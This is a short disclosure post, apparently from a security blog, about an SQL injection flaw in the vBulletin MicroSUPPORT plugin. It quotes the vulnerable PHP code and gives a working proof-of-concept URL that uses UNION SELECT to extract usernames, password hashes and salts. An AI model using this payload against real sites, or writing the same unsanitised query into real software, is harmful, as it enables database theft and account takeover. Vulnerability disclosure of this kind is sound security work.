vBulletin MicroSUPPORT Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=254336
Version: <= 4.6.4 (latest) The vulnerability resides in the microsupport.php file. Not a single variable is sanitized and directly used in the SQL queries, at all places. An easy way to extract information out of the database is by abusing the checkchatcall_request part in the php file, which looks like this:

if ($_REQUEST[‘requester’] == “checkchatcall_request”) {
	$adminsID = $vbulletin->input->clean_gpc(‘r’, ‘adminsID’, TYPE_STR);
	$chatcheck = $db->query_read(“SELECT * FROM “.TABLE_PREFIX.”microsupport_supportusers_online WHERE supportuserid=$adminsID”);
	
	while($row = $db->fetch_array($chatcheck)) {
		if($row[usersUID] > 0){
			$usersid = $row[usersUID];
    $output = ‘checkchatcall=1&supportuseridrequester=’.$usersid;
		}else{
    $output = ‘checkchatcall=0’;
		}
	}
	echo $output;
}

Proof of concept:
http://example.com/microsupport.php?requester=checkchatcall_request&adminsID=1 UNION SELECT null, concat(1, 0x3a, username, 0x3a, password, 0x3a, salt), null, null, null FROM user where userid = 1

Note that the first field in the concat function must be a number since the function checks if the usersUID is bigger than 0, which is the first column in the result.

Images
microSUPPORT SQL Injection

Comments

  1. can you fix it somehow

Leave a Reply

Your email address will not be published / Required fields are marked *